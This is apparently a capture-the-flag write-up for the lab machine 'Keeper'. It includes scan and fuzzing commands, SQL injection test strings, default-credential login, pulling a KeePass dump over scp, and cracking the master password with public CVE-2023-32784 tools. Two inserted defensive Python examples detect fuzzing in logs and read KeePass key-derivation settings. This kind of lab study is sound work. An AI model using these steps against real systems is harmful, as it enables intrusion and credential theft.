# Lessons Learned

- xxx

---

# After-Action Attack Sequence

- BLUF: xxx
- xxx

---

# Discover Ports & Services

- `ping` test
  ![[images/Pasted image 20260417192328.png]]
- `nmap` scan - light
  ![[images/Pasted image 20260417192348.png]]
- `nmap` scan - detailed
  ![[images/Pasted image 20260417192456.png]]
- `nmap` scan - UDP
  ![[images/Pasted image 20260417194611.png]]

---

# Service Enum

## Port 80 (HTTP): nginx 1.18.0

## `http://IP_addr`

- visit page
  ![[images/Pasted image 20260417192624.png]]
- source
  ![[images/Pasted image 20260417192643.png]]
- `request:response`
  ![[images/Pasted image 20260417192719.png]]

## `tickets.keeper.htb/rt`

- Add to `/etc/hosts`
- Visit page > Request Tracker ver. 4.4.4
  ![[images/Pasted image 20260417193009.png]]
- source
  ![[images/Pasted image 20260417193249.png]]
  - I see `/rt/NoAuth/Login.html`
- `request:response`
  ![[images/Pasted image 20260417193400.png]]
  - We have a cookie with another vhost?
- test with blank login
  ![[images/Pasted image 20260417194033.png]]
  - Maybe the `next` parameter is an encoded IDOR vector?
### Fuzzing

- Directory fuzzing
  ![[images/Pasted image 20260417201541.png]]
  - `/m/` for mobile
    ![[images/Pasted image 20260417193707.png]]
  - Potential SQLi
    ![[images/Pasted image 20260417193910.png]]

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://tickets.keeper.htb/FUZZ -c -ic -fs 0,95
```

- Vhost fuzzing
  ![[images/Pasted image 20260417201657.png]]
- Subdomain fuzzing

### SQLi

- Manual SQLi tests - none of these work

```bash
admin'
admin'-- -
admin' OR 1=1
admin' OR 1=1-- -
```

- `sqlmap` against `/rt` - nothing

```bash
sqlmap -r request.txt --batch --dbms=mysql --technique=BEU --risk=3 --level=5
```

- Manual UNION injection tests

```bash
test' UNION SELECT 1,2;-- -
test' UNION SELECT 1,2,2,3,4,5,6;-- -
test' UNION SELECT 1,@@version,2,3,4,5,6;-- -
# once we determine the number of columns, determine the injectable column
```

## Default Creds

- `admin:admin`
- `root:password` -- from some Googling on Request Tracker 4.4.4
- We're in as `root`
  ![[images/Pasted image 20260417195623.png]]
- There is one open ticket
  ![[images/Pasted image 20260417195749.png]]
  - crash dump of `keepass` attached to the initial ticket; then removed by the sysadmin `lnorgaard` and saved to their home dir
  - maybe we can load a script to get a revshell as `www-data`, then crack the keepass db?
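The directory and vhost fuzzing above is noisy from the server's side: every wordlist entry that does not exist is logged as a 404 from one client inside a few seconds, and `ffuf`'s `-fs` filter only hides responses on the attacker's screen, not in the log. As an added defender's example (not part of these notes, and not captured from this box), the Python below runs that detection over constructed nginx combined-format log lines; the client IPs, paths and user agent string are made up for the demo, and the 60-second / 10-miss threshold is an assumption to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_fuzzing(lines, window_s=60, threshold=10):
    """Return {ip: peak_404_count} for clients whose 404s in any window_s-second
    window reach threshold. Wordlist-driven content discovery produces exactly
    this shape: many distinct missing paths in a burst from a single source."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None and rec["status"] == 404:
            per_ip[rec["ip"]].append(rec["ts"])

    findings = {}
    for ip, times in per_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            # slide the window start forward until the span fits within window_s
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = peak
    return findings


# Constructed wordlist entries for the sample (not from any real wordlist run).
FUZZED_PATHS = ["admin", "backup", "m", "old", "test", "dev", "api",
                "config", "tmp", "uploads", "cgi-bin", "private"]


def build_sample_log():
    """Constructed sample log lines (not captured from any real host)."""
    lines = []
    for i, path in enumerate(FUZZED_PATHS):
        # twelve misses from one client inside three seconds
        lines.append(
            f'203.0.113.20 - - [17/Apr/2026:20:15:{i // 4:02d} +0000] '
            f'"GET /{path} HTTP/1.1" 404 153 "-" "Fuzz Faster U Fool v2.1.0"'
        )
    # ordinary browsing: one hit and one stray 404, minutes apart
    lines.append('192.0.2.10 - - [17/Apr/2026:20:10:03 +0000] '
                 '"GET /rt/NoAuth/Login.html HTTP/1.1" 200 2341 "-" "Mozilla/5.0"')
    lines.append('192.0.2.10 - - [17/Apr/2026:20:18:40 +0000] '
                 '"GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"')
    lines.append("not a log line")  # malformed input is skipped, not fatal
    return lines


if __name__ == "__main__":
    for ip, n in find_fuzzing(build_sample_log()).items():
        print(f"{ip}: {n} x 404 within 60s -> likely content discovery")
```

The count-based rule is deliberately independent of the user agent, which a scanner can set to anything; the burst of distinct 404s is the signal that survives. Vhost fuzzing leaves the same pattern only if the log format includes `$host`, so add it to `log_format` if you want to see that variant.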
- look for authenticated RCEs - no POCs found from Googling
  - `searchsploit`
    ![[images/Pasted image 20260417202409.png]]
  - `searchsploit`
    ![[images/Pasted image 20260417202501.png]]
- Comment field for `lnorgaard` has a password
  ![[images/Pasted image 20260417203102.png]]
- `ssh` into target with creds for `lnorgaard`
  ![[images/Pasted image 20260417203238.png]]
- let's exfil this ZIP, I assume it's the keepass db

```bash
scp lnorgaard@IP_addr:/home/lnorgaard/RT30000.zip ~/Documents/htb/boxes/keeper/RT30000.zip
```

![[images/Pasted image 20260417203542.png]]

- Unzip and inspect
  ![[images/Pasted image 20260417203626.png]]
- Run `keepass2john` and attempt to crack with `-m 13400`

```bash
keepass2john passcodes.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /opt/rockyou.txt
```

- This is taking too long
- Let's Google "keepass 2.x exploits"
- Found CVE-2023-32784, which exploits a keepass dump file, which we have
  - https://github.com/vdohney/keepass-password-dumper uses .NET
  - https://github.com/matro7sh/keepass-dump-masterkey uses Python - notes that the first character will be missing
  - https://github.com/ynuwenhof/keedump uses Rust

## .NET version

- Install .NET

```bash
wget https://packages.microsoft.com/config/debian/13/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb   # install signing key
rm packages-microsoft-prod.deb
sudo apt-get update && sudo apt-get install -y dotnet-sdk-10.0          # .NET SDK
sudo apt-get update && sudo apt-get install -y aspnetcore-runtime-10.0  # .NET runtime
git clone https://github.com/vdohney/keepass-password-dumper
cd ./keepass-password-dumper
dotnet run ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp
```

- Looks like the POC is using .NET 7.0, but I downloaded 10.0
  ![[images/Pasted image 20260417211347.png]]

## Rust version

```bash
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install cargo
cargo install keedump
git clone https://github.com/ynuwenhof/keedump.git
cd keedump
cargo install --path .
echo 'export PATH="$HOME/.cargo/bin:$PATH"' >> ~/.bashrc
source ~/.bashrc
echo "$PATH"   # confirm
keedump -i ~/Documents/htb/boxes/keeper/KeePassDumpFull.dmp
```

- Illegible
  ![[images/Pasted image 20260417205521.png]]

## `strings`

- Way too many lines
  ![[images/Pasted image 20260417212022.png]]
- Try to pipe into grep
  ![[images/Pasted image 20260417212031.png]]

## Python version

- still getting a garbage output
  ![[images/Pasted image 20260417210213.png]]
- Google the output > we see a Danish porridge
  ![[images/Pasted image 20260417213007.png]]
- Now download `kpcli` and open

```bash
sudo apt install -y kpcli
kpcli                  # interactive shell; the next line is typed at its prompt
open passcodes.kdbx
```

- `passcodes/Network` has 2 entries
  ![[images/Pasted image 20260417213752.png]]
- Entry 0 has a hidden password and a PuTTY privkey
  ![[images/Pasted image 20260417213849.png]]
- After some Googling, we can use `-f` to reverse the redaction
- Use `su root` to privesc - fails
- Now create a `.ppk` and clean it up
- Convert `.ppk` to openssh
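The `keepass2john` / `hashcat -m 13400` step above "taking too long" is the database doing its job: a KDBX 4 file derives its key with Argon2 or a large number of AES-KDF rounds, and those cost parameters sit unencrypted in the outer header, so a defender can read them off any `.kdbx` to judge how much work an offline guess costs. As an added example (not from these notes and not a KeePass tool), the Python below parses that header; the layout follows the KDBX 4 format KeePass publishes (signatures, 4-byte field lengths, the VariantDictionary encoding of the KDF parameters and the three KDF UUIDs), and the two header blobs it reads are constructed in the script itself, not taken from a real database.

```python
import struct
import uuid

# KDBX signatures and KDF identifiers as published in the KeePass source.
SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67
KDF_NAMES = {
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
}
HF_END, HF_KDF_PARAMS = 0x00, 0x0B                 # outer header field types used here
VD_UINT32, VD_UINT64, VD_BYTES = 0x04, 0x05, 0x42  # VariantDictionary value types


def parse_variant_dictionary(buf):
    """Decode a KDBX 4 VariantDictionary (how the KDF parameters are serialised)."""
    (version,) = struct.unpack_from("<H", buf, 0)
    if (version & 0xFF00) != 0x0100:
        raise ValueError("unsupported VariantDictionary version")
    pos, out = 2, {}
    while buf[pos] != 0x00:                        # a type byte of 0 terminates the dictionary
        vtype = buf[pos]
        (nlen,) = struct.unpack_from("<I", buf, pos + 1)
        name = bytes(buf[pos + 5:pos + 5 + nlen]).decode("utf-8")
        pos += 5 + nlen
        (vlen,) = struct.unpack_from("<I", buf, pos)
        raw = bytes(buf[pos + 4:pos + 4 + vlen])
        pos += 4 + vlen
        if vtype == VD_UINT32:
            out[name] = struct.unpack("<I", raw)[0]
        elif vtype == VD_UINT64:
            out[name] = struct.unpack("<Q", raw)[0]
        else:
            out[name] = raw                        # byte arrays (and any other type) kept raw
    return out


def parse_kdbx_header(data):
    """Walk the unencrypted outer header of a KDBX 4 file and return its KDF parameters."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    if major != 4:
        raise ValueError(f"KDBX {major}.{minor}: only the KDBX 4 header layout is handled")
    pos, kdf = 12, {}
    while True:
        ftype = data[pos]
        (flen,) = struct.unpack_from("<I", data, pos + 1)   # 4-byte field length in KDBX 4
        field = data[pos + 5:pos + 5 + flen]
        pos += 5 + flen
        if ftype == HF_END:
            break
        if ftype == HF_KDF_PARAMS:
            kdf = parse_variant_dictionary(field)
    return {"version": f"{major}.{minor}", "kdf": kdf}


def summarize_kdf(header):
    """Reduce the raw KDF dictionary to the numbers that set the per-guess cost."""
    kdf = header["kdf"]
    name = KDF_NAMES.get(uuid.UUID(bytes=kdf.get("$UUID", b"\0" * 16)), "unknown")
    if name.startswith("Argon2"):   # M = memory in bytes, I = passes, P = lanes
        return {"kdf": name, "memory_mib": kdf["M"] // (1024 * 1024),
                "iterations": kdf["I"], "parallelism": kdf["P"]}
    if name == "AES-KDF":           # R = transform rounds
        return {"kdf": name, "rounds": kdf["R"]}
    return {"kdf": name}


def build_sample_header(kdf_name, params):
    """Constructed minimal KDBX 4 header (demo input only, not a real database)."""
    kdf_uuid = next(u for u, n in KDF_NAMES.items() if n == kdf_name)

    def entry(vtype, name, raw):
        return (bytes([vtype]) + struct.pack("<I", len(name)) + name.encode()
                + struct.pack("<I", len(raw)) + raw)

    vd = struct.pack("<H", 0x0100) + entry(VD_BYTES, "$UUID", kdf_uuid.bytes)
    for name, (vtype, value) in params.items():
        raw = value if vtype == VD_BYTES else struct.pack("<I" if vtype == VD_UINT32 else "<Q", value)
        vd += entry(vtype, name, raw)
    vd += b"\x00"

    def field(ftype, raw):
        return bytes([ftype]) + struct.pack("<I", len(raw)) + raw

    return struct.pack("<IIHH", SIG1, SIG2, 0, 4) + field(HF_KDF_PARAMS, vd) + field(HF_END, b"\r\n\r\n")


# Two constructed headers: a memory-hard Argon2d setup and a plain AES-KDF one.
ARGON2_SAMPLE = build_sample_header("Argon2d", {
    "S": (VD_BYTES, b"\x11" * 32), "P": (VD_UINT32, 2),
    "M": (VD_UINT64, 64 * 1024 * 1024), "I": (VD_UINT64, 10), "V": (VD_UINT32, 0x13),
})
AESKDF_SAMPLE = build_sample_header("AES-KDF", {"S": (VD_BYTES, b"\x22" * 32), "R": (VD_UINT64, 60000)})

if __name__ == "__main__":
    for blob in (ARGON2_SAMPLE, AESKDF_SAMPLE):
        print(summarize_kdf(parse_kdbx_header(blob)))
```

Run it against a real file with `parse_kdbx_header(open("passcodes.kdbx", "rb").read())`; only the plaintext header is read, nothing is decrypted. Whatever cracker is pointed at the hash has to pay the Argon2 memory and passes (or the AES-KDF rounds) once per candidate, which is why a weak master password is the only thing a wordlist attack can realistically recover and why the memory-dump CVE above was a faster route than cracking.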